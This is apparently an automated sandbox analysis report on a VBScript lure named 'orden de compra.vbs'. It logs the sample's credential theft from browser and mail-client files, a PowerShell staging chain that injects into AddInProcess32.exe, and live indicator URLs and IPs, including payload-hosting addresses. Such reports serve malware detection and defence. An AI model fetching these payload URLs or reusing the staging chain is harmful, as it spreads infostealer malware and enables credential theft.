                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: 4.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000004.00000002.2962871474.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: AddInProcess32.exe PID: 6160, type: MEMORYSTR
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                  Source: Yara matchFile source: 4.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000004.00000002.2973300391.0000000002A25000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.2962871474.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: AddInProcess32.exe PID: 6160, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Source: Yara matchFile source: 4.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000004.00000002.2962871474.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: AddInProcess32.exe PID: 6160, type: MEMORYSTR
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity Information221
                  Scripting
                  Valid Accounts231
                  Windows Management Instrumentation
                  221
                  Scripting
                  1
                  DLL Side-Loading
                  1
                  Disable or Modify Tools
                  1
                  OS Credential Dumping
                  1
                  File and Directory Discovery
                  Remote Services1
                  Archive Collected Data
                  1
                  Web Service
                  Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts1
                  Exploitation for Client Execution
                  1
                  DLL Side-Loading
                  311
                  Process Injection
                  2
                  Obfuscated Files or Information
                  LSASS Memory34
                  System Information Discovery
                  Remote Desktop Protocol1
                  Data from Local System
                  1
                  Ingress Tool Transfer
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts11
                  Command and Scripting Interpreter
                  Logon Script (Windows)Logon Script (Windows)1
                  Software Packing
                  Security Account Manager531
                  Security Software Discovery
                  SMB/Windows Admin Shares1
                  Email Collection
                  11
                  Encrypted Channel
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal Accounts3
                  PowerShell
                  Login HookLogin Hook1
                  DLL Side-Loading
                  NTDS1
                  Process Discovery
                  Distributed Component Object ModelInput Capture2
                  Non-Application Layer Protocol
                  Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                  Masquerading
                  LSA Secrets261
                  Virtualization/Sandbox Evasion
                  SSHKeylogging13
                  Application Layer Protocol
                  Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts261
                  Virtualization/Sandbox Evasion
                  Cached Domain Credentials1
                  Application Window Discovery
                  VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items311
                  Process Injection
                  DCSync1
                  System Network Configuration Discovery
                  Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1430757 Sample: orden de compra.vbs Startdate: 24/04/2024 Architecture: WINDOWS Score: 100 30 paste.ee 2->30 32 uploaddeimagens.com.br 2->32 34 ip-api.com 2->34 44 Snort IDS alert for network traffic 2->44 46 Found malware configuration 2->46 48 Malicious sample detected (through community Yara rule) 2->48 52 13 other signatures 2->52 9 wscript.exe 14 2->9         started        signatures3 50 Connects to a pastebin service (likely for C&C) 30->50 process4 dnsIp5 38 paste.ee 104.21.84.67, 443, 49730 CLOUDFLARENETUS United States 9->38 62 System process connects to network (likely due to code injection or exploit) 9->62 64 VBScript performs obfuscated calls to suspicious functions 9->64 66 Suspicious powershell command line found 9->66 68 5 other signatures 9->68 13 powershell.exe 7 9->13         started        signatures6 process7 signatures8 70 Suspicious powershell command line found 13->70 72 Found suspicious powershell code related to unpacking or dynamic code loading 13->72 16 powershell.exe 14 15 13->16         started        20 conhost.exe 13->20         started        process9 dnsIp10 26 uploaddeimagens.com.br 104.21.45.138, 443, 49731, 49732 CLOUDFLARENETUS United States 16->26 28 192.3.243.154, 49733, 80 AS-COLOCROSSINGUS United States 16->28 40 Writes to foreign memory regions 16->40 42 Injects a PE file into a foreign processes 16->42 22 AddInProcess32.exe 15 2 16->22         started        signatures11 process12 dnsIp13 36 ip-api.com 208.95.112.1, 49734, 80 TUT-ASUS United States 22->36 54 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 22->54 56 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 22->56 58 Tries to steal Mail credentials (via file / registry access) 22->58 60 3 other signatures 22->60 signatures14

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  SourceDetectionScannerLabelLink
                  orden de compra.vbs16%ReversingLabsWin32.Trojan.Generic
                  No Antivirus matches
                  No Antivirus matches
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
                  https://contoso.com/License0%URL Reputationsafe
                  https://contoso.com/Icon0%URL Reputationsafe
                  https://contoso.com/0%URL Reputationsafe
                  https://uploaddeimagens.com.br/images/004/760/043/full/new_image.jpg?17112878870%Avira URL Cloudsafe
                  https://analytics.paste.ee;0%Avira URL Cloudsafe
                  https://uploaddeimagens.com.br/0%Avira URL Cloudsafe
                  https://cdnjs.cloudflare.com;0%Avira URL Cloudsafe
                  https://uploaddeimagens.com.br/images/004/760/044/original/new_image.jpg?17112878880%Avira URL Cloudsafe
                  https://uploaddeimagens.com.br0%Avira URL Cloudsafe
                  https://www.google.com;0%Avira URL Cloudsafe
                  http://192.3.243.154/yobro.txt0%Avira URL Cloudsafe
                  http://192.3.243.1540%Avira URL Cloudsafe
                  NameIPActiveMaliciousAntivirus DetectionReputation
                  paste.ee
                  104.21.84.67
                  truefalse
                    high
                    ip-api.com
                    208.95.112.1
                    truefalse
                      high
                      uploaddeimagens.com.br
                      104.21.45.138
                      truetrue
                        unknown
                        NameMaliciousAntivirus DetectionReputation
                        https://paste.ee/d/gK5wAfalse
                          high
                          http://192.3.243.154/yobro.txttrue
                          • Avira URL Cloud: safe
                          unknown
                          https://uploaddeimagens.com.br/images/004/760/043/full/new_image.jpg?1711287887true
                          • Avira URL Cloud: safe
                          unknown
                          https://uploaddeimagens.com.br/images/004/760/044/original/new_image.jpg?1711287888true
                          • Avira URL Cloud: safe
                          unknown
                          http://ip-api.com/line/?fields=hostingfalse
                            high
                            NameSourceMaliciousAntivirus DetectionReputation
                            http://nuget.org/NuGet.exepowershell.exe, 00000003.00000002.2075863098.000001F4167CE000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://account.dyn.com/AddInProcess32.exe, 00000004.00000002.2962871474.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                high
                                http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000003.00000002.1778680417.000001F406975000.00000004.00000800.00020000.00000000.sdmptrue
                                • URL Reputation: malware
                                unknown
                                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000003.00000002.1778680417.000001F406975000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://contoso.com/Licensepowershell.exe, 00000003.00000002.2075863098.000001F4167CE000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://www.google.com;wscript.exe, 00000000.00000002.1689833906.000002262F2CB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1689833906.000002262F2B7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1688629994.000002262F145000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  low
                                  https://contoso.com/Iconpowershell.exe, 00000003.00000002.2075863098.000001F4167CE000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://paste.ee/d/gK5wA;wscript.exe, 00000000.00000003.1687834660.000002262D189000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1689698174.000002262D189000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1688277570.000002262D189000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    https://analytics.paste.eewscript.exe, 00000000.00000002.1689833906.000002262F2CB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1688629994.000002262F145000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      https://aka.ms/pscore6powershell.exe, 00000001.00000002.2120789924.000001EC00051000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://uploaddeimagens.com.br/powershell.exe, 00000003.00000002.1777989868.000001F4047AA000.00000004.00000020.00020000.00000000.sdmptrue
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://github.com/Pester/Pesterpowershell.exe, 00000003.00000002.1778680417.000001F406975000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://www.google.comwscript.exe, 00000000.00000002.1689833906.000002262F2CB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1688629994.000002262F145000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            https://paste.ee/d/gK5wARwscript.exe, 00000000.00000002.1689631112.000002262D13B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1688154539.000002262D13B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1688844641.000002262D13B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1688770085.000002262D13B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1688629994.000002262F145000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              https://uploaddeimagens.com.brpowershell.exe, 00000003.00000002.1778680417.000001F406975000.00000004.00000800.00020000.00000000.sdmptrue
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://contoso.com/powershell.exe, 00000003.00000002.2075863098.000001F4167CE000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              https://nuget.org/nuget.exepowershell.exe, 00000003.00000002.2075863098.000001F4167CE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://ip-api.comAddInProcess32.exe, 00000004.00000002.2973300391.0000000002AD2000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000004.00000002.2973300391.0000000002AB8000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000004.00000002.2973300391.00000000029F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://paste.ee/wscript.exe, 00000000.00000003.1687834660.000002262D189000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1689698174.000002262D189000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1688277570.000002262D189000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    https://analytics.paste.ee;wscript.exe, 00000000.00000002.1689833906.000002262F2CB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1688629994.000002262F145000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    low
                                                    https://cdnjs.cloudflare.comwscript.exe, 00000000.00000002.1689833906.000002262F2CB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1688629994.000002262F145000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      https://aka.ms/pscore68powershell.exe, 00000001.00000002.2120789924.000001EC0006C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1778680417.000001F406751000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://cdnjs.cloudflare.com;wscript.exe, 00000000.00000002.1689833906.000002262F2CB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1689833906.000002262F2B7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1688629994.000002262F145000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        low
                                                        http://192.3.243.154powershell.exe, 00000003.00000002.1778680417.000001F40D101000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.2120789924.000001EC000A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1778680417.000001F406751000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000004.00000002.2973300391.0000000002AB8000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000004.00000002.2973300391.00000000029F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://secure.gravatar.comwscript.exe, 00000000.00000002.1689833906.000002262F2CB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1688629994.000002262F145000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            https://themes.googleusercontent.comwscript.exe, 00000000.00000002.1689833906.000002262F2CB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1689833906.000002262F2B7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1688629994.000002262F145000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              • No. of IPs < 25%
                                                              • 25% < No. of IPs < 50%
                                                              • 50% < No. of IPs < 75%
                                                              • 75% < No. of IPs
                                                              IPDomainCountryFlagASNASN NameMalicious
                                                              208.95.112.1
                                                              ip-api.comUnited States
                                                              53334TUT-ASUSfalse
                                                              104.21.45.138
                                                              uploaddeimagens.com.brUnited States
                                                              13335CLOUDFLARENETUStrue
                                                              192.3.243.154
                                                              unknownUnited States
                                                              36352AS-COLOCROSSINGUStrue
                                                              104.21.84.67
                                                              paste.eeUnited States
                                                              13335CLOUDFLARENETUSfalse
                                                              Joe Sandbox version:40.0.0 Tourmaline
                                                              Analysis ID:1430757
                                                              Start date and time:2024-04-24 06:53:16 +02:00
                                                              Joe Sandbox product:CloudBasic
                                                              Overall analysis duration:0h 5m 43s
                                                              Hypervisor based Inspection enabled:false
                                                              Report type:full
                                                              Cookbook file name:default.jbs
                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                              Number of analysed new started processes analysed:10
                                                              Number of new started drivers analysed:0
                                                              Number of existing processes analysed:0
                                                              Number of existing drivers analysed:0
                                                              Number of injected processes analysed:0
                                                              Technologies:
                                                              • HCA enabled
                                                              • EGA enabled
                                                              • AMSI enabled
                                                              Analysis Mode:default
                                                              Analysis stop reason:Timeout
                                                              Sample name:orden de compra.vbs
                                                              Detection:MAL
                                                              Classification:mal100.spre.troj.spyw.expl.evad.winVBS@8/6@3/4
                                                              EGA Information:
                                                              • Successful, ratio: 50%
                                                              HCA Information:
                                                              • Successful, ratio: 100%
                                                              • Number of executed functions: 13
                                                              • Number of non-executed functions: 2
                                                              Cookbook Comments:
                                                              • Found application associated with file extension: .vbs
                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                              • Execution Graph export aborted for target powershell.exe, PID 2656 because it is empty
                                                              • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                              • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                              • Not all processes where analyzed, report is missing behavior information
                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                              • VT rate limit hit for: orden de compra.vbs
                                                              TimeTypeDescription
                                                              06:54:10API Interceptor45x Sleep call for process: powershell.exe modified
                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              208.95.112.1G4-TODOS.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                              • ip-api.com/line/?fields=hosting
                                                              RICHIESTA-QUOTAZIONI.jarGet hashmaliciousSTRRATBrowse
                                                              • ip-api.com/json/
                                                              explorer.exeGet hashmaliciousRedLine, XWormBrowse
                                                              • ip-api.com/line/?fields=hosting
                                                              X1.exeGet hashmaliciousXWormBrowse
                                                              • ip-api.com/line/?fields=hosting
                                                              Output.exeGet hashmaliciousRedLine, XWormBrowse
                                                              • ip-api.com/line/?fields=hosting
                                                              X2.exeGet hashmaliciousXWormBrowse
                                                              • ip-api.com/line/?fields=hosting
                                                              55HUe105hhh123333.exeGet hashmaliciousAgentTeslaBrowse
                                                              • ip-api.com/line/?fields=hosting
                                                              PI88009454 007865EQ.exeGet hashmaliciousAgentTeslaBrowse
                                                              • ip-api.com/line/?fields=hosting
                                                              Request for Quotation.exeGet hashmaliciousAgentTeslaBrowse
                                                              • ip-api.com/line/?fields=hosting
                                                              Factura E24000319v00. SL.exeGet hashmaliciousAgentTesla, PureLog Stealer, RedLineBrowse
                                                              • ip-api.com/line/?fields=hosting
                                                              104.21.45.138gmb.xlsGet hashmaliciousUnknownBrowse
                                                                bZA95up38s.rtfGet hashmaliciousAgentTeslaBrowse
                                                                  SecuriteInfo.com.Win32.SuspectCrc.28876.20318.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                    eInvoicing_pdf.vbsGet hashmaliciousFormBookBrowse
                                                                      Signed Proforma Invoice 3645479_pdf.vbsGet hashmaliciousFormBookBrowse
                                                                        F723838674.vbsGet hashmaliciousRemcosBrowse
                                                                          DHL Receipt_pdf.vbsGet hashmaliciousAgentTeslaBrowse
                                                                            Remittance slip.vbsGet hashmaliciousUnknownBrowse
                                                                              SecuriteInfo.com.Exploit.ShellCode.69.31966.31539.rtfGet hashmaliciousRemcosBrowse
                                                                                F873635427.vbsGet hashmaliciousRemcos, XWormBrowse
                                                                                  104.21.84.67Chitanta bancara - #113243.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                                  • paste.ee/d/u4bvR
                                                                                  rdevuelto_Pagos.wsfGet hashmaliciousAgentTeslaBrowse
                                                                                  • paste.ee/d/SDfNF
                                                                                  Product list 0980DF098A7.xlsGet hashmaliciousUnknownBrowse
                                                                                  • paste.ee/d/enGXm
                                                                                  Payment_advice.vbsGet hashmaliciousUnknownBrowse
                                                                                  • paste.ee/d/wXm0Y
                                                                                  SHREE GANESH BOOK SERVICES-347274.xlsGet hashmaliciousUnknownBrowse
                                                                                  • paste.ee/d/eA3FM
                                                                                  dereac.vbeGet hashmaliciousUnknownBrowse
                                                                                  • paste.ee/d/JZHbW
                                                                                  P018400.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                  • paste.ee/d/kmRFs
                                                                                  comprobante0089.xla.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                                  • paste.ee/d/cJo7v
                                                                                  RFQ l MR24000112.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                  • paste.ee/d/EgkAG
                                                                                  87645345.vbsGet hashmaliciousXWormBrowse
                                                                                  • paste.ee/d/IJGyf
                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  ip-api.comG4-TODOS.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                  • 208.95.112.1
                                                                                  RICHIESTA-QUOTAZIONI.jarGet hashmaliciousSTRRATBrowse
                                                                                  • 208.95.112.1
                                                                                  explorer.exeGet hashmaliciousRedLine, XWormBrowse
                                                                                  • 208.95.112.1
                                                                                  X1.exeGet hashmaliciousXWormBrowse
                                                                                  • 208.95.112.1
                                                                                  Output.exeGet hashmaliciousRedLine, XWormBrowse
                                                                                  • 208.95.112.1
                                                                                  X2.exeGet hashmaliciousXWormBrowse
                                                                                  • 208.95.112.1
                                                                                  55HUe105hhh123333.exeGet hashmaliciousAgentTeslaBrowse
                                                                                  • 208.95.112.1
                                                                                  PI88009454 007865EQ.exeGet hashmaliciousAgentTeslaBrowse
                                                                                  • 208.95.112.1
                                                                                  file.exeGet hashmaliciousGuLoader, PXRECVOWEIWOEI StealerBrowse
                                                                                  • 208.95.112.1
                                                                                  Request for Quotation.exeGet hashmaliciousAgentTeslaBrowse
                                                                                  • 208.95.112.1
                                                                                  paste.eeReconfirm Details.vbsGet hashmaliciousAgentTeslaBrowse
                                                                                  • 104.21.84.67
                                                                                  New order-Docs0374.xlsGet hashmaliciousUnknownBrowse
                                                                                  • 104.21.84.67
                                                                                  gmb.xlsGet hashmaliciousUnknownBrowse
                                                                                  • 104.21.84.67
                                                                                  72625413524.vbsGet hashmaliciousXWormBrowse
                                                                                  • 172.67.187.200
                                                                                  Purchase Inquiry.vbsGet hashmaliciousAgentTeslaBrowse
                                                                                  • 172.67.187.200
                                                                                  bZA95up38s.rtfGet hashmaliciousAgentTeslaBrowse
                                                                                  • 104.21.84.67
                                                                                  mWimHae6l9.exeGet hashmaliciousUnknownBrowse
                                                                                  • 172.67.187.200
                                                                                  UmJMWJPQ9h.exeGet hashmaliciousXWormBrowse
                                                                                  • 172.67.187.200
                                                                                  GPgMeqI8Gy.exeGet hashmaliciousXWormBrowse
                                                                                  • 104.21.84.67
                                                                                  E3XzKxHCCb.exeGet hashmaliciousXWormBrowse
                                                                                  • 172.67.187.200
                                                                                  uploaddeimagens.com.brReconfirm Details.vbsGet hashmaliciousAgentTeslaBrowse
                                                                                  • 172.67.215.45
                                                                                  gmb.xlsGet hashmaliciousUnknownBrowse
                                                                                  • 104.21.45.138
                                                                                  72625413524.vbsGet hashmaliciousXWormBrowse
                                                                                  • 172.67.215.45
                                                                                  Purchase Inquiry.vbsGet hashmaliciousAgentTeslaBrowse
                                                                                  • 172.67.215.45
                                                                                  bZA95up38s.rtfGet hashmaliciousAgentTeslaBrowse
                                                                                  • 104.21.45.138
                                                                                  SecuriteInfo.com.Exploit.ShellCode.69.14498.22623.rtfGet hashmaliciousRemcosBrowse
                                                                                  • 172.67.215.45
                                                                                  SecuriteInfo.com.Win32.SuspectCrc.28876.20318.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                                  • 104.21.45.138
                                                                                  Invoice No. 03182024.docxGet hashmaliciousRemcosBrowse
                                                                                  • 172.67.215.45
                                                                                  eInvoicing_pdf.vbsGet hashmaliciousFormBookBrowse
                                                                                  • 104.21.45.138
                                                                                  F723838674.vbsGet hashmaliciousUnknownBrowse
                                                                                  • 104.21.45.138
                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  CLOUDFLARENETUSDHL Shipping doc.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                  • 104.26.13.205
                                                                                  Reconfirm Details.vbsGet hashmaliciousAgentTeslaBrowse
                                                                                  • 172.67.215.45
                                                                                  Remittance-Advice.docGet hashmaliciousUnknownBrowse
                                                                                  • 172.67.175.222
                                                                                  shipping docs.docGet hashmaliciousUnknownBrowse
                                                                                  • 104.21.74.191
                                                                                  Invoice.docGet hashmaliciousAgentTeslaBrowse
                                                                                  • 172.67.134.136
                                                                                  Pedido02304024.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                  • 172.67.152.117
                                                                                  purchase order pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                  • 104.26.12.205
                                                                                  PO 23JC0704-Rollease-B.exeGet hashmaliciousAgentTeslaBrowse
                                                                                  • 104.26.13.205
                                                                                  UXNob1Dp32.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                  • 104.21.65.24
                                                                                  BARSYL SHIPPING Co (VIETNAM).exeGet hashmaliciousAgentTeslaBrowse
                                                                                  • 172.67.74.152
                                                                                  TUT-ASUSG4-TODOS.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                  • 208.95.112.1
                                                                                  RICHIESTA-QUOTAZIONI.jarGet hashmaliciousSTRRATBrowse
                                                                                  • 208.95.112.1
                                                                                  explorer.exeGet hashmaliciousRedLine, XWormBrowse
                                                                                  • 208.95.112.1
                                                                                  X1.exeGet hashmaliciousXWormBrowse
                                                                                  • 208.95.112.1
                                                                                  Output.exeGet hashmaliciousRedLine, XWormBrowse
                                                                                  • 208.95.112.1
                                                                                  X2.exeGet hashmaliciousXWormBrowse
                                                                                  • 208.95.112.1
                                                                                  55HUe105hhh123333.exeGet hashmaliciousAgentTeslaBrowse
                                                                                  • 208.95.112.1
                                                                                  PI88009454 007865EQ.exeGet hashmaliciousAgentTeslaBrowse
                                                                                  • 208.95.112.1
                                                                                  file.exeGet hashmaliciousGuLoader, PXRECVOWEIWOEI StealerBrowse
                                                                                  • 208.95.112.1
                                                                                  Request for Quotation.exeGet hashmaliciousAgentTeslaBrowse
                                                                                  • 208.95.112.1
                                                                                  AS-COLOCROSSINGUSRICHIESTA-QUOTAZIONI.jarGet hashmaliciousSTRRATBrowse
                                                                                  • 107.172.148.197
                                                                                  768.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                  • 23.95.60.77
                                                                                  cb9YYjPyUR.jarGet hashmaliciousSTRRATBrowse
                                                                                  • 107.172.148.197
                                                                                  TcnD64eVFK.exeGet hashmaliciousRemcosBrowse
                                                                                  • 107.175.229.143
                                                                                  Comprobante.xlam.xlsxGet hashmaliciousGuLoaderBrowse
                                                                                  • 23.95.60.77
                                                                                  Gam.xlsGet hashmaliciousUnknownBrowse
                                                                                  • 23.94.36.10
                                                                                  Quotation.xlsGet hashmaliciousRemcosBrowse
                                                                                  • 107.175.229.143
                                                                                  Gam.xlsGet hashmaliciousUnknownBrowse
                                                                                  • 23.94.36.10
                                                                                  Gam.xlsGet hashmaliciousUnknownBrowse
                                                                                  • 23.94.36.10
                                                                                  https://39.104-168-101-28.cprapid.com/Pay-PaI/Get hashmaliciousPayPal PhisherBrowse
                                                                                  • 104.168.101.28
                                                                                  CLOUDFLARENETUSDHL Shipping doc.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                  • 104.26.13.205
                                                                                  Reconfirm Details.vbsGet hashmaliciousAgentTeslaBrowse
                                                                                  • 172.67.215.45
                                                                                  Remittance-Advice.docGet hashmaliciousUnknownBrowse
                                                                                  • 172.67.175.222
                                                                                  shipping docs.docGet hashmaliciousUnknownBrowse
                                                                                  • 104.21.74.191
                                                                                  Invoice.docGet hashmaliciousAgentTeslaBrowse
                                                                                  • 172.67.134.136
                                                                                  Pedido02304024.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                  • 172.67.152.117
